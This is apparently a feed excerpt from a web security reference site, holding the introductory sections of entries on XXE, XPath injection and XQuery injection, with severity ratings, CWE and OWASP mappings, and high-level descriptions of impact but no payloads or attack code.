Critical <strong>CWE</strong>: CWE-611 <strong>OWASP</strong>: A05:2021 – Security Misconfiguration</p> </blockquote> <hr> <h2 id="what-is-xxe">What Is XXE?</h2> <p>XML External Entity Injection occurs when an <strong>XML parser processes external entity declarations</strong> defined by the attacker within the XML input. If the parser is configured to resolve external entities (often the default in older or misconfigured libraries), an attacker can:</p> <ul> <li>Read arbitrary files from the server filesystem</li> <li>Trigger SSRF to internal services and cloud metadata</li> <li>Perform blind data exfiltration via DNS/HTTP</li> <li>In some configurations, achieve Remote Code Execution</li> </ul> <p>XXE affects anything that parses XML: REST APIs accepting <code>Content-Type: application/xml</code>, SOAP services, file upload endpoints processing DOCX/XLSX/SVG/PDF/ODT, and any XML-based data exchange format.</p> XPath Injection https://az0th.it/web/input/004-input-xpath-injection/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/004-input-xpath-injection/ <h1 id="xpath-injection">XPath Injection</h1> <blockquote> <p><strong>Severity</strong>: High | <strong>CWE</strong>: CWE-91 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-xpath-injection">What Is XPath Injection?</h2> <p>XPath is a query language for navigating XML documents. Applications that use XPath to query XML-backed datastores (config files, LDAP over XML, XML databases, SAML assertions) are vulnerable when user input is concatenated directly into XPath expressions.</p> <p>Unlike SQL, <strong>XPath has no native parameterization</strong> in most implementations — making injection structurally similar to classic SQLi but with XPath operators and axes.</p> XQuery Injection https://az0th.it/web/input/005-input-xquery-injection/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/005-input-xquery-injection/ <h1 id="xquery-injection">XQuery Injection</h1> <blockquote> <p><strong>Severity</strong>: High | <strong>CWE</strong>: CWE-652 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-xquery-injection">What Is XQuery Injection?</h2> <p>XQuery is a functional query language for XML databases (BaseX, eXist-db, MarkLogic, Saxon). Like SQL injection against relational databases, XQuery injection occurs when user input is concatenated directly into an XQuery expression. The impact ranges from data extraction (full XML database dump) to RCE in some implementations that expose XQuery functions like <code>file:write()</code>, <code>proc:system()</code>, or Java class invocation.</p>